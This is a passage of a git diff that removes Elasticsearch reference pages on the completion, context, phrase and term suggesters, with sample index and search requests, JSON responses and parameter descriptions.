- -[horizontal] -`input`:: - The input to store, this can be an array of strings or just - a string. This field is mandatory. -+ -[NOTE] -==== -This value cannot contain the following UTF-16 control characters: - -* `\u0000` (null) -* `\u001f` (information separator one) -* `\u001e` (information separator two) -==== - - -`weight`:: - A positive integer or a string containing a positive integer, - which defines a weight and allows you to rank your suggestions. - This field is optional. - -You can index multiple suggestions for a document as follows: - -[source,console] --------------------------------------------------- -PUT music/_doc/1?refresh -{ - "suggest": [ - { - "input": "Nevermind", - "weight": 10 - }, - { - "input": "Nirvana", - "weight": 3 - } - ] -} --------------------------------------------------- -// TEST[continued] - -You can use the following shorthand form. Note that you can not specify -a weight with suggestion(s) in the shorthand form. - -[source,console] --------------------------------------------------- -PUT music/_doc/1?refresh -{ - "suggest" : [ "Nevermind", "Nirvana" ] -} --------------------------------------------------- -// TEST[continued] - -[[querying]] -===== Querying - -Suggesting works as usual, except that you have to specify the suggest -type as `completion`. Suggestions are near real-time, which means -new suggestions can be made visible by <> and -documents once deleted are never shown. 
This request: - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "prefix": "nir", <1> - "completion": { <2> - "field": "suggest" <3> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> Prefix used to search for suggestions -<2> Type of suggestions -<3> Name of the field to search for suggestions in - -returns this response: - -[source,console-result] --------------------------------------------------- -{ - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits": ... - "took": 2, - "timed_out": false, - "suggest": { - "song-suggest" : [ { - "text" : "nir", - "offset" : 0, - "length" : 3, - "options" : [ { - "text" : "Nirvana", - "_index": "music", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": { - "suggest": ["Nevermind", "Nirvana"] - } - } ] - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"hits": .../"hits": "$body.hits",/] -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] - - -IMPORTANT: `_source` metadata field must be enabled, which is the default -behavior, to enable returning `_source` with suggestions. - -The configured weight for a suggestion is returned as `_score`. The -`text` field uses the `input` of your indexed suggestion. Suggestions -return the full document `_source` by default. The size of the `_source` -can impact performance due to disk fetch and network transport overhead. -To save some network overhead, filter out unnecessary fields from the `_source` -using <> to minimize -`_source` size. Note that the _suggest endpoint doesn't support source -filtering but using suggest on the `_search` endpoint does: - -[source,console] --------------------------------------------------- -POST music/_search -{ - "_source": "suggest", <1> - "suggest": { - "song-suggest": { - "prefix": "nir", - "completion": { - "field": "suggest", <2> - "size": 5 <3> - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> Filter the source to return only the `suggest` field -<2> Name of the field to search for suggestions in -<3> Number of suggestions to return - -Which should look like: - -[source,console-result] --------------------------------------------------- -{ - "took": 6, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 0, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "suggest": { - "song-suggest": [ { - "text": "nir", - "offset": 0, - "length": 3, - "options": [ { - "text": "Nirvana", - "_index": "music", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": { - "suggest": [ "Nevermind", "Nirvana" ] - } - } ] - } ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 6,/"took": $body.took,/] - -The basic completion suggester query supports the following parameters: - -[horizontal] -`field`:: The name of the field on which to run the query (required). -`size`:: The number of suggestions to return (defaults to `5`). -`skip_duplicates`:: Whether duplicate suggestions should be filtered out (defaults to `false`). - -NOTE: The completion suggester considers all documents in the index. -See <> for an explanation of how to query a subset of -documents instead. 
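For illustration only (this sketch is not part of the original page and is not hooked into the snippet tests), a request combining all three of these basic parameters against the `music` index defined above might look like:

[source,console]
----
POST music/_search
{
  "suggest": {
    "song-suggest": {
      "prefix": "ne",
      "completion": {
        "field": "suggest",
        "size": 3,
        "skip_duplicates": true
      }
    }
  }
}
----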
- -NOTE: In case of completion queries spanning more than one shard, the suggest -is executed in two phases, where the last phase fetches the relevant documents -from shards, implying executing completion requests against a single shard is -more performant due to the document fetch overhead when the suggest spans -multiple shards. To get best performance for completions, it is recommended to -index completions into a single shard index. In case of high heap usage due to -shard size, it is still recommended to break index into multiple shards instead -of optimizing for completion performance. - -[[skip_duplicates]] -===== Skip duplicate suggestions - -Queries can return duplicate suggestions coming from different documents. -It is possible to modify this behavior by setting `skip_duplicates` to true. -When set, this option filters out documents with duplicate suggestions from the result. - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "prefix": "nor", - "completion": { - "field": "suggest", - "skip_duplicates": true - } - } - } -} --------------------------------------------------- - -WARNING: When set to true, this option can slow down search because more suggestions -need to be visited to find the top N. - -[[fuzzy]] -===== Fuzzy queries - -The completion suggester also supports fuzzy queries -- this means -you can have a typo in your search and still get results back. - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "prefix": "nor", - "completion": { - "field": "suggest", - "fuzzy": { - "fuzziness": 2 - } - } - } - } -} --------------------------------------------------- - -Suggestions that share the longest prefix to the query `prefix` will -be scored higher. - -The fuzzy query can take specific fuzzy parameters. -The following parameters are supported: - -[horizontal] -`fuzziness`:: - The fuzziness factor, defaults to `AUTO`. - See <> for allowed settings. - -`transpositions`:: - if set to `true`, transpositions are counted - as one change instead of two, defaults to `true` - -`min_length`:: - Minimum length of the input before fuzzy - suggestions are returned, defaults `3` - -`prefix_length`:: - Minimum length of the input, which is not - checked for fuzzy alternatives, defaults to `1` - -`unicode_aware`:: - If `true`, all measurements (like fuzzy edit - distance, transpositions, and lengths) are - measured in Unicode code points instead of - in bytes. This is slightly slower than raw - bytes, so it is set to `false` by default. - -NOTE: If you want to stick with the default values, but - still use fuzzy, you can either use `fuzzy: {}` - or `fuzzy: true`. - -[[regex]] -===== Regex queries - -The completion suggester also supports regex queries meaning -you can express a prefix as a regular expression - -[source,console] --------------------------------------------------- -POST music/_search?pretty -{ - "suggest": { - "song-suggest": { - "regex": "n[ever|i]r", - "completion": { - "field": "suggest" - } - } - } -} --------------------------------------------------- - -The regex query can take specific regex parameters. -The following parameters are supported: - -[horizontal] -`flags`:: - Possible flags are `ALL` (default), `ANYSTRING`, `COMPLEMENT`, - `EMPTY`, `INTERSECTION`, `INTERVAL`, or `NONE`. 
See <> - for their meaning - -`max_determinized_states`:: - Regular expressions are dangerous because it's easy to accidentally - create an innocuous looking one that requires an exponential number of - internal determinized automaton states (and corresponding RAM and CPU) - for Lucene to execute. Lucene prevents these using the - `max_determinized_states` setting (defaults to 10000). You can raise - this limit to allow more complex regular expressions to execute. diff --git a/docs/reference/search/suggesters/context-suggest.asciidoc b/docs/reference/search/suggesters/context-suggest.asciidoc deleted file mode 100644 index cbc027f4f54..00000000000 --- a/docs/reference/search/suggesters/context-suggest.asciidoc +++ /dev/null @@ -1,380 +0,0 @@ -[[context-suggester]] -==== Context Suggester - -The completion suggester considers all documents in the index, but it is often -desirable to serve suggestions filtered and/or boosted by some criteria. -For example, you want to suggest song titles filtered by certain artists or -you want to boost song titles based on their genre. - -To achieve suggestion filtering and/or boosting, you can add context mappings while -configuring a completion field. You can define multiple context mappings for a -completion field. -Every context mapping has a unique name and a type. There are two types: `category` -and `geo`. Context mappings are configured under the `contexts` parameter in -the field mapping. - -NOTE: It is mandatory to provide a context when indexing and querying - a context enabled completion field. - -The following defines types, each with two context mappings for a completion -field: - -[source,console] --------------------------------------------------- -PUT place -{ - "mappings": { - "properties": { - "suggest": { - "type": "completion", - "contexts": [ - { <1> - "name": "place_type", - "type": "category" - }, - { <2> - "name": "location", - "type": "geo", - "precision": 4 - } - ] - } - } - } -} -PUT place_path_category -{ - "mappings": { - "properties": { - "suggest": { - "type": "completion", - "contexts": [ - { <3> - "name": "place_type", - "type": "category", - "path": "cat" - }, - { <4> - "name": "location", - "type": "geo", - "precision": 4, - "path": "loc" - } - ] - }, - "loc": { - "type": "geo_point" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -<1> Defines a `category` context named 'place_type' where the categories must be - sent with the suggestions. -<2> Defines a `geo` context named 'location' where the categories must be sent - with the suggestions. -<3> Defines a `category` context named 'place_type' where the categories are - read from the `cat` field. -<4> Defines a `geo` context named 'location' where the categories are read from - the `loc` field. - -NOTE: Adding context mappings increases the index size for completion field. The completion index -is entirely heap resident, you can monitor the completion field index size using <>. - -[[suggester-context-category]] -[discrete] -===== Category Context - -The `category` context allows you to associate one or more categories with suggestions at index -time. At query time, suggestions can be filtered and boosted by their associated categories. - -The mappings are set up like the `place_type` fields above. 
If `path` is defined -then the categories are read from that path in the document, otherwise they must -be sent in the suggest field like this: - -[source,console] --------------------------------------------------- -PUT place/_doc/1 -{ - "suggest": { - "input": [ "timmy's", "starbucks", "dunkin donuts" ], - "contexts": { - "place_type": [ "cafe", "food" ] <1> - } - } -} --------------------------------------------------- - -<1> These suggestions will be associated with 'cafe' and 'food' category. - -If the mapping had a `path` then the following index request would be enough to -add the categories: - -[source,console] --------------------------------------------------- -PUT place_path_category/_doc/1 -{ - "suggest": ["timmy's", "starbucks", "dunkin donuts"], - "cat": ["cafe", "food"] <1> -} --------------------------------------------------- - -<1> These suggestions will be associated with 'cafe' and 'food' category. - -NOTE: If context mapping references another field and the categories -are explicitly indexed, the suggestions are indexed with both set -of categories. - - -[discrete] -====== Category Query - -Suggestions can be filtered by one or more categories. The following -filters suggestions by multiple categories: - -[source,console] --------------------------------------------------- -POST place/_search?pretty -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "place_type": [ "cafe", "restaurants" ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: If multiple categories or category contexts are set on the query -they are merged as a disjunction. This means that suggestions match -if they contain at least one of the provided context values. - -Suggestions with certain categories can be boosted higher than others. -The following filters suggestions by categories and additionally boosts -suggestions associated with some categories: - -[source,console] --------------------------------------------------- -POST place/_search?pretty -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "place_type": [ <1> - { "context": "cafe" }, - { "context": "restaurants", "boost": 2 } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The context query filter suggestions associated with - categories 'cafe' and 'restaurants' and boosts the - suggestions associated with 'restaurants' by a - factor of `2` - -In addition to accepting category values, a context query can be composed of -multiple category context clauses. The following parameters are supported for a -`category` context clause: - -[horizontal] -`context`:: - The value of the category to filter/boost on. - This is mandatory. - -`boost`:: - The factor by which the score of the suggestion - should be boosted, the score is computed by - multiplying the boost with the suggestion weight, - defaults to `1` - -`prefix`:: - Whether the category value should be treated as a - prefix or not. For example, if set to `true`, - you can filter category of 'type1', 'type2' and - so on, by specifying a category prefix of 'type'. - Defaults to `false` - -NOTE: If a suggestion entry matches multiple contexts the final score is computed as the -maximum score produced by any matching contexts. 
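The `prefix` parameter described above has no dedicated example on this page. For illustration only (not part of the original page and not hooked into the snippet tests), the following request filters suggestions whose `place_type` category starts with `caf`:

[source,console]
----
POST place/_search?pretty
{
  "suggest": {
    "place_suggestion": {
      "prefix": "tim",
      "completion": {
        "field": "suggest",
        "size": 10,
        "contexts": {
          "place_type": [
            { "context": "caf", "prefix": true }
          ]
        }
      }
    }
  }
}
----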
- -[[suggester-context-geo]] -[discrete] -===== Geo location Context - -A `geo` context allows you to associate one or more geo points or geohashes with suggestions -at index time. At query time, suggestions can be filtered and boosted if they are within -a certain distance of a specified geo location. - -Internally, geo points are encoded as geohashes with the specified precision. - -[discrete] -====== Geo Mapping - -In addition to the `path` setting, `geo` context mapping accepts the following settings: - -[horizontal] -`precision`:: - This defines the precision of the geohash to be indexed and can be specified - as a distance value (`5m`, `10km` etc.), or as a raw geohash precision (`1`..`12`). - Defaults to a raw geohash precision value of `6`. - -NOTE: The index time `precision` setting sets the maximum geohash precision that -can be used at query time. - -[discrete] -====== Indexing geo contexts - -`geo` contexts can be explicitly set with suggestions or be indexed from a geo point field in the -document via the `path` parameter, similar to `category` contexts. Associating multiple geo location context -with a suggestion, will index the suggestion for every geo location. The following indexes a suggestion -with two geo location contexts: - -[source,console] --------------------------------------------------- -PUT place/_doc/1 -{ - "suggest": { - "input": "timmy's", - "contexts": { - "location": [ - { - "lat": 43.6624803, - "lon": -79.3863353 - }, - { - "lat": 43.6624718, - "lon": -79.3873227 - } - ] - } - } -} --------------------------------------------------- - -[discrete] -====== Geo location Query - -Suggestions can be filtered and boosted with respect to how close they are to one or -more geo points. The following filters suggestions that fall within the area represented by -the encoded geohash of a geo point: - -[source,console] --------------------------------------------------- -POST place/_search -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "location": { - "lat": 43.662, - "lon": -79.380 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: When a location with a lower precision at query time is specified, all suggestions -that fall within the area will be considered. - -NOTE: If multiple categories or category contexts are set on the query -they are merged as a disjunction. This means that suggestions match -if they contain at least one of the provided context values. 
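A `geo` context clause can also take a geohash string instead of a `lat`/`lon` object, as described in the clause parameters later in this section. For illustration only (the geohash value here is a placeholder, and this sketch is not part of the original page or its snippet tests), the following request boosts suggestions indexed in the geohash cell `dpz8`:

[source,console]
----
POST place/_search
{
  "suggest": {
    "place_suggestion": {
      "prefix": "tim",
      "completion": {
        "field": "suggest",
        "size": 10,
        "contexts": {
          "location": [
            { "context": "dpz8", "boost": 2 }
          ]
        }
      }
    }
  }
}
----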
- -Suggestions that are within an area represented by a geohash can also be boosted higher -than others, as shown by the following: - -[source,console] --------------------------------------------------- -POST place/_search?pretty -{ - "suggest": { - "place_suggestion": { - "prefix": "tim", - "completion": { - "field": "suggest", - "size": 10, - "contexts": { - "location": [ <1> - { - "lat": 43.6624803, - "lon": -79.3863353, - "precision": 2 - }, - { - "context": { - "lat": 43.6624803, - "lon": -79.3863353 - }, - "boost": 2 - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The context query filters for suggestions that fall under - the geo location represented by a geohash of '(43.662, -79.380)' - with a precision of '2' and boosts suggestions - that fall under the geohash representation of '(43.6624803, -79.3863353)' - with a default precision of '6' by a factor of `2` - -NOTE: If a suggestion entry matches multiple contexts the final score is computed as the -maximum score produced by any matching contexts. - -In addition to accepting context values, a context query can be composed of -multiple context clauses. The following parameters are supported for a -`geo` context clause: - -[horizontal] -`context`:: - A geo point object or a geo hash string to filter or - boost the suggestion by. This is mandatory. - -`boost`:: - The factor by which the score of the suggestion - should be boosted, the score is computed by - multiplying the boost with the suggestion weight, - defaults to `1` - -`precision`:: - The precision of the geohash to encode the query geo point. - This can be specified as a distance value (`5m`, `10km` etc.), - or as a raw geohash precision (`1`..`12`). - Defaults to index time precision level. - -`neighbours`:: - Accepts an array of precision values at which - neighbouring geohashes should be taken into account. - precision value can be a distance value (`5m`, `10km` etc.) - or a raw geohash precision (`1`..`12`). Defaults to - generating neighbours for index time precision level. diff --git a/docs/reference/search/suggesters/misc.asciidoc b/docs/reference/search/suggesters/misc.asciidoc deleted file mode 100644 index b32dffbab54..00000000000 --- a/docs/reference/search/suggesters/misc.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[return-suggesters-type]] -==== Returning the type of the suggester - -Sometimes you need to know the exact type of a suggester in order to parse its results. The `typed_keys` parameter - can be used to change the suggester's name in the response so that it will be prefixed by its type. 
- -Considering the following example with two suggesters `term` and `phrase`: - -[source,console] --------------------------------------------------- -POST _search?typed_keys -{ - "suggest": { - "text" : "some test mssage", - "my-first-suggester" : { - "term" : { - "field" : "message" - } - }, - "my-second-suggester" : { - "phrase" : { - "field" : "message" - } - } - } -} --------------------------------------------------- -// TEST[setup:messages] - -In the response, the suggester names will be changed to respectively `term#my-first-suggester` and -`phrase#my-second-suggester`, reflecting the types of each suggestion: - -[source,console-result] --------------------------------------------------- -{ - "suggest": { - "term#my-first-suggester": [ <1> - { - "text": "some", - "offset": 0, - "length": 4, - "options": [] - }, - { - "text": "test", - "offset": 5, - "length": 4, - "options": [] - }, - { - "text": "mssage", - "offset": 10, - "length": 6, - "options": [ - { - "text": "message", - "score": 0.8333333, - "freq": 4 - } - ] - } - ], - "phrase#my-second-suggester": [ <2> - { - "text": "some test mssage", - "offset": 0, - "length": 16, - "options": [ - { - "text": "some test message", - "score": 0.030227963 - } - ] - } - ] - }, - ... -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": "$body.took", "timed_out": false, "_shards": "$body._shards", "hits": "$body.hits"/] -// TESTRESPONSE[s/"score": 0.8333333/"score": $body.suggest.term#my-first-suggester.2.options.0.score/] -// TESTRESPONSE[s/"score": 0.030227963/"score": $body.suggest.phrase#my-second-suggester.0.options.0.score/] - -<1> The name `my-first-suggester` now contains the `term` prefix. -<2> The name `my-second-suggester` now contains the `phrase` prefix. diff --git a/docs/reference/search/suggesters/phrase-suggest.asciidoc b/docs/reference/search/suggesters/phrase-suggest.asciidoc deleted file mode 100644 index e7428b54892..00000000000 --- a/docs/reference/search/suggesters/phrase-suggest.asciidoc +++ /dev/null @@ -1,441 +0,0 @@ -[[phrase-suggester]] -==== Phrase Suggester - -NOTE: In order to understand the format of suggestions, please -read the <> page first. - -The `term` suggester provides a very convenient API to access word -alternatives on a per token basis within a certain string distance. The API -allows accessing each token in the stream individually while -suggest-selection is left to the API consumer. Yet, often pre-selected -suggestions are required in order to present to the end-user. The -`phrase` suggester adds additional logic on top of the `term` suggester -to select entire corrected phrases instead of individual tokens weighted -based on `ngram-language` models. In practice this suggester will be -able to make better decisions about which tokens to pick based on -co-occurrence and frequencies. - -===== API Example - -In general the `phrase` suggester requires special mapping up front to work. -The `phrase` suggester examples on this page need the following mapping to -work. The `reverse` analyzer is used only in the last example. 
- -[source,console] --------------------------------------------------- -PUT test -{ - "settings": { - "index": { - "number_of_shards": 1, - "analysis": { - "analyzer": { - "trigram": { - "type": "custom", - "tokenizer": "standard", - "filter": ["lowercase","shingle"] - }, - "reverse": { - "type": "custom", - "tokenizer": "standard", - "filter": ["lowercase","reverse"] - } - }, - "filter": { - "shingle": { - "type": "shingle", - "min_shingle_size": 2, - "max_shingle_size": 3 - } - } - } - } - }, - "mappings": { - "properties": { - "title": { - "type": "text", - "fields": { - "trigram": { - "type": "text", - "analyzer": "trigram" - }, - "reverse": { - "type": "text", - "analyzer": "reverse" - } - } - } - } - } -} -POST test/_doc?refresh=true -{"title": "noble warriors"} -POST test/_doc?refresh=true -{"title": "nobel prize"} --------------------------------------------------- -// TESTSETUP - -Once you have the analyzers and mappings set up you can use the `phrase` -suggester in the same spot you'd use the `term` suggester: - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text": "noble prize", - "simple_phrase": { - "phrase": { - "field": "title.trigram", - "size": 1, - "gram_size": 3, - "direct_generator": [ { - "field": "title.trigram", - "suggest_mode": "always" - } ], - "highlight": { - "pre_tag": "", - "post_tag": "" - } - } - } - } -} --------------------------------------------------- - -The response contains suggestions scored by the most likely spelling correction first. In this case we received the expected correction "nobel prize". - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits": ... - "timed_out": false, - "took": 3, - "suggest": { - "simple_phrase" : [ - { - "text" : "noble prize", - "offset" : 0, - "length" : 11, - "options" : [ { - "text" : "nobel prize", - "highlighted": "nobel prize", - "score" : 0.48614594 - }] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": .../"_shards": "$body._shards",/] -// TESTRESPONSE[s/"hits": .../"hits": "$body.hits",/] -// TESTRESPONSE[s/"took": 3,/"took": "$body.took",/] - -===== Basic Phrase suggest API parameters - -[horizontal] -`field`:: - The name of the field used to do n-gram lookups for the - language model, the suggester will use this field to gain statistics to - score corrections. This field is mandatory. - -`gram_size`:: - Sets max size of the n-grams (shingles) in the `field`. - If the field doesn't contain n-grams (shingles), this should be omitted - or set to `1`. Note that Elasticsearch tries to detect the gram size - based on the specified `field`. If the field uses a `shingle` filter, the - `gram_size` is set to the `max_shingle_size` if not explicitly set. - -`real_word_error_likelihood`:: - The likelihood of a term being - misspelled even if the term exists in the dictionary. The default is - `0.95`, meaning 5% of the real words are misspelled. - - -`confidence`:: - The confidence level defines a factor applied to the - input phrases score which is used as a threshold for other suggest - candidates. Only candidates that score higher than the threshold will be - included in the result. For instance a confidence level of `1.0` will - only return suggestions that score higher than the input phrase. If set - to `0.0` the top N candidates are returned. The default is `1.0`. 
- -`max_errors`:: - The maximum percentage of the terms - considered to be misspellings in order to form a correction. This method - accepts a float value in the range `[0..1)` as a fraction of the actual - query terms or a number `>=1` as an absolute number of query terms. The - default is set to `1.0`, meaning only corrections with - at most one misspelled term are returned. Note that setting this too high - can negatively impact performance. Low values like `1` or `2` are recommended; - otherwise the time spend in suggest calls might exceed the time spend in - query execution. - -`separator`:: - The separator that is used to separate terms in the - bigram field. If not set the whitespace character is used as a - separator. - -`size`:: - The number of candidates that are generated for each - individual query term. Low numbers like `3` or `5` typically produce good - results. Raising this can bring up terms with higher edit distances. The - default is `5`. - -`analyzer`:: - Sets the analyzer to analyze to suggest text with. - Defaults to the search analyzer of the suggest field passed via `field`. - -`shard_size`:: - Sets the maximum number of suggested terms to be - retrieved from each individual shard. During the reduce phase, only the - top N suggestions are returned based on the `size` option. Defaults to - `5`. - -`text`:: - Sets the text / query to provide suggestions for. - -`highlight`:: - Sets up suggestion highlighting. If not provided then - no `highlighted` field is returned. If provided must - contain exactly `pre_tag` and `post_tag`, which are - wrapped around the changed tokens. If multiple tokens - in a row are changed the entire phrase of changed tokens - is wrapped rather than each token. - -`collate`:: - Checks each suggestion against the specified `query` to prune suggestions - for which no matching docs exist in the index. The collate query for a - suggestion is run only on the local shard from which the suggestion has - been generated from. The `query` must be specified and it can be templated, - see <> for more information. - The current suggestion is automatically made available as the `{{suggestion}}` - variable, which should be used in your query. You can still specify - your own template `params` -- the `suggestion` value will be added to the - variables you specify. Additionally, you can specify a `prune` to control - if all phrase suggestions will be returned; when set to `true` the suggestions - will have an additional option `collate_match`, which will be `true` if - matching documents for the phrase was found, `false` otherwise. - The default value for `prune` is `false`. - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text" : "noble prize", - "simple_phrase" : { - "phrase" : { - "field" : "title.trigram", - "size" : 1, - "direct_generator" : [ { - "field" : "title.trigram", - "suggest_mode" : "always", - "min_word_length" : 1 - } ], - "collate": { - "query": { <1> - "source" : { - "match": { - "{{field_name}}" : "{{suggestion}}" <2> - } - } - }, - "params": {"field_name" : "title"}, <3> - "prune": true <4> - } - } - } - } -} --------------------------------------------------- - -<1> This query will be run once for every suggestion. -<2> The `{{suggestion}}` variable will be replaced by the text - of each suggestion. -<3> An additional `field_name` variable has been specified in - `params` and is used by the `match` query. 
-<4> All suggestions will be returned with an extra `collate_match` - option indicating whether the generated phrase matched any - document. - -===== Smoothing Models - -The `phrase` suggester supports multiple smoothing models to balance -weight between infrequent grams (grams (shingles) are not existing in -the index) and frequent grams (appear at least once in the index). The -smoothing model can be selected by setting the `smoothing` parameter -to one of the following options. Each smoothing model supports specific -properties that can be configured. - -[horizontal] -`stupid_backoff`:: - A simple backoff model that backs off to lower - order n-gram models if the higher order count is `0` and discounts the - lower order n-gram model by a constant factor. The default `discount` is - `0.4`. Stupid Backoff is the default model. - -`laplace`:: - A smoothing model that uses an additive smoothing where a - constant (typically `1.0` or smaller) is added to all counts to balance - weights. The default `alpha` is `0.5`. - -`linear_interpolation`:: - A smoothing model that takes the weighted - mean of the unigrams, bigrams, and trigrams based on user supplied - weights (lambdas). Linear Interpolation doesn't have any default values. - All parameters (`trigram_lambda`, `bigram_lambda`, `unigram_lambda`) - must be supplied. - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text" : "obel prize", - "simple_phrase" : { - "phrase" : { - "field" : "title.trigram", - "size" : 1, - "smoothing" : { - "laplace" : { - "alpha" : 0.7 - } - } - } - } - } -} --------------------------------------------------- - -===== Candidate Generators - -The `phrase` suggester uses candidate generators to produce a list of -possible terms per term in the given text. A single candidate generator -is similar to a `term` suggester called for each individual term in the -text. The output of the generators is subsequently scored in combination -with the candidates from the other terms for suggestion candidates. - -Currently only one type of candidate generator is supported, the -`direct_generator`. The Phrase suggest API accepts a list of generators -under the key `direct_generator`; each of the generators in the list is -called per term in the original text. - -===== Direct Generators - -The direct generators support the following parameters: - -[horizontal] -`field`:: - The field to fetch the candidate suggestions from. This is - a required option that either needs to be set globally or per - suggestion. - -`size`:: - The maximum corrections to be returned per suggest text token. - -`suggest_mode`:: - The suggest mode controls what suggestions are included on the suggestions - generated on each shard. All values other than `always` can be thought of - as an optimization to generate fewer suggestions to test on each shard and - are not rechecked when combining the suggestions generated on each - shard. Thus `missing` will generate suggestions for terms on shards that do - not contain them even if other shards do contain them. Those should be - filtered out using `confidence`. Three possible values can be specified: - ** `missing`: Only generate suggestions for terms that are not in the - shard. This is the default. - ** `popular`: Only suggest terms that occur in more docs on the shard than - the original term. - ** `always`: Suggest any matching suggestions based on terms in the - suggest text. 
- -`max_edits`:: - The maximum edit distance candidate suggestions can have - in order to be considered as a suggestion. Can only be a value between 1 - and 2. Any other value results in a bad request error being thrown. - Defaults to 2. - -`prefix_length`:: - The number of minimal prefix characters that must - match in order be a candidate suggestions. Defaults to 1. Increasing - this number improves spellcheck performance. Usually misspellings don't - occur in the beginning of terms. (Old name "prefix_len" is deprecated) - -`min_word_length`:: - The minimum length a suggest text term must have in - order to be included. Defaults to 4. (Old name "min_word_len" is deprecated) - -`max_inspections`:: - A factor that is used to multiply with the - `shards_size` in order to inspect more candidate spelling corrections on - the shard level. Can improve accuracy at the cost of performance. - Defaults to 5. - -`min_doc_freq`:: - The minimal threshold in number of documents a - suggestion should appear in. This can be specified as an absolute number - or as a relative percentage of number of documents. This can improve - quality by only suggesting high frequency terms. Defaults to 0f and is - not enabled. If a value higher than 1 is specified, then the number - cannot be fractional. The shard level document frequencies are used for - this option. - -`max_term_freq`:: - The maximum threshold in number of documents in which a - suggest text token can exist in order to be included. Can be a relative - percentage number (e.g., 0.4) or an absolute number to represent document - frequencies. If a value higher than 1 is specified, then fractional can - not be specified. Defaults to 0.01f. This can be used to exclude high - frequency terms -- which are usually spelled correctly -- from being spellchecked. This also improves the spellcheck - performance. The shard level document frequencies are used for this - option. - -`pre_filter`:: - A filter (analyzer) that is applied to each of the - tokens passed to this candidate generator. This filter is applied to the - original token before candidates are generated. - -`post_filter`:: - A filter (analyzer) that is applied to each of the - generated tokens before they are passed to the actual phrase scorer. - -The following example shows a `phrase` suggest call with two generators: -the first one is using a field containing ordinary indexed terms, and the -second one uses a field that uses terms indexed with a `reverse` filter -(tokens are index in reverse order). This is used to overcome the limitation -of the direct generators to require a constant prefix to provide -high-performance suggestions. The `pre_filter` and `post_filter` options -accept ordinary analyzer names. - -[source,console] --------------------------------------------------- -POST test/_search -{ - "suggest": { - "text" : "obel prize", - "simple_phrase" : { - "phrase" : { - "field" : "title.trigram", - "size" : 1, - "direct_generator" : [ { - "field" : "title.trigram", - "suggest_mode" : "always" - }, { - "field" : "title.reverse", - "suggest_mode" : "always", - "pre_filter" : "reverse", - "post_filter" : "reverse" - } ] - } - } - } -} --------------------------------------------------- - -`pre_filter` and `post_filter` can also be used to inject synonyms after -candidates are generated. For instance for the query `captain usq` we -might generate a candidate `usa` for the term `usq`, which is a synonym for -`america`. 
This allows us to present `captain america` to the user if this -phrase scores high enough. diff --git a/docs/reference/search/suggesters/term-suggest.asciidoc b/docs/reference/search/suggesters/term-suggest.asciidoc deleted file mode 100644 index 43d91ce164f..00000000000 --- a/docs/reference/search/suggesters/term-suggest.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[[term-suggester]] -==== Term suggester - -NOTE: In order to understand the format of suggestions, please -read the <> page first. - -The `term` suggester suggests terms based on edit distance. The provided -suggest text is analyzed before terms are suggested. The suggested terms -are provided per analyzed suggest text token. The `term` suggester -doesn't take the query into account that is part of request. - -===== Common suggest options: - -[horizontal] -`text`:: - The suggest text. The suggest text is a required option that - needs to be set globally or per suggestion. - -`field`:: - The field to fetch the candidate suggestions from. This is - a required option that either needs to be set globally or per - suggestion. - -`analyzer`:: - The analyzer to analyse the suggest text with. Defaults - to the search analyzer of the suggest field. - -`size`:: - The maximum corrections to be returned per suggest text - token. - -`sort`:: - Defines how suggestions should be sorted per suggest text - term. Two possible values: -+ - ** `score`: Sort by score first, then document frequency and - then the term itself. - ** `frequency`: Sort by document frequency first, then similarity - score and then the term itself. -+ -`suggest_mode`:: - The suggest mode controls what suggestions are - included or controls for what suggest text terms, suggestions should be - suggested. Three possible values can be specified: -+ - ** `missing`: Only provide suggestions for suggest text terms that are - not in the index. This is the default. - ** `popular`: Only suggest suggestions that occur in more docs than - the original suggest text term. - ** `always`: Suggest any matching suggestions based on terms in the - suggest text. - -===== Other term suggest options: - -[horizontal] -`max_edits`:: - The maximum edit distance candidate suggestions can - have in order to be considered as a suggestion. Can only be a value - between 1 and 2. Any other value results in a bad request error being - thrown. Defaults to 2. - -`prefix_length`:: - The number of minimal prefix characters that must - match in order be a candidate for suggestions. Defaults to 1. Increasing - this number improves spellcheck performance. Usually misspellings don't - occur in the beginning of terms. (Old name "prefix_len" is deprecated) - -`min_word_length`:: - The minimum length a suggest text term must have in - order to be included. Defaults to 4. (Old name "min_word_len" is deprecated) - -`shard_size`:: - Sets the maximum number of suggestions to be retrieved - from each individual shard. During the reduce phase only the top N - suggestions are returned based on the `size` option. Defaults to the - `size` option. Setting this to a value higher than the `size` can be - useful in order to get a more accurate document frequency for spelling - corrections at the cost of performance. Due to the fact that terms are 